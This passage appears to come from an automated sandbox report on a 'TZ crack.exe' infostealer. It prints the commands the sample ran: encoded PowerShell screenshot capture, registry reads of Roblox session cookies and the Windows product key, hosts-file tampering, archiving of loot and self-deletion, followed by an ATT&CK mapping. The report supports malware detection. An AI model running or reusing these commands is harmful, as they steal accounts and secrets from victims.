    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    PID:824
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3196
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5tnvl5fl\5tnvl5fl.cmdline"
        5⤵
        
        PID:2564
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F2E.tmp" "c:\Users\Admin\AppData\Local\Temp\5tnvl5fl\CSC82375ADB73BB4078BC3B77C424E5078.TMP"
        6⤵
        
        PID:3212
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4800
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:2304
  - - C:\Windows\system32\attrib.exe
      attrib -r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4564
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:4360
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3208
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
    3⤵
    PID:4412
  - - C:\Windows\system32\attrib.exe
      attrib +r C:\Windows\System32\drivers\etc\hosts
      4⤵
      Drops file in Drivers directory
      Views/modifies file attributes
      PID:4200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1508
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4740
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:904
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1060
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:916
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1464
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1584
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:3208
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1636
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2664
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1508
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:2908
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3460
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\KLaCJ.zip" *"
    3⤵
    PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\_MEI31042\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI31042\rar.exe a -r -hp"blank123" "C:\Users\Admin\AppData\Local\Temp\KLaCJ.zip" *
      4⤵
      Executes dropped EXE
      PID:3420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:4392
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      PID:4164
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:2784
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:1840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:2840
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:956
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:5024
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3232
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:3540
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:2940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:4512
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:1068
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\Admin\AppData\Local\Temp\TZ crack.exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:452
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2940

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffc728edcf8,0x7ffc728edd04,0x7ffc728edd10
  2⤵
  PID:1044
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1592,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2168 /prefetch:3
  2⤵
  PID:4920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1912,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1908 /prefetch:2
  2⤵
  PID:320
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2392,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2536 /prefetch:8
  2⤵
  PID:824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3196,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3216 /prefetch:1
  2⤵
  PID:2128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3220,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3240 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4436,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4468 /prefetch:2
  2⤵
  PID:2064
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4740,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4656 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5336,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5360 /prefetch:8
  2⤵
  PID:1200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5352,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5552 /prefetch:8
  2⤵
  PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=240,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5508 /prefetch:8
  2⤵
  PID:4412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5560,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5712 /prefetch:8
  2⤵
  PID:2424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5460,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5740 /prefetch:8
  2⤵
  PID:2148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=5572,i,5658938872655185241,245611068894399874,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=5644 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3948

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:2188

Network

MITRE ATT&CK Enterprise v16

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
414B

MD5
7828ed9f56e05d0795f27eeabb5ecb75

SHA1
03b25aed596cb4fa6c2c76832a2cf4aac2d9f6a1

SHA256
7178b4f6bfa391c9585f511874b6bee47de20136a757f1d32e68f8afa16f4878

SHA512
961f9258cf493bfd28b855ae4cc536ef1a7464243da06c0ee451532deed7731968f186754aab2576c965032c05e0f28c80280ccccbcccef5b2103f8adbaf1912

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

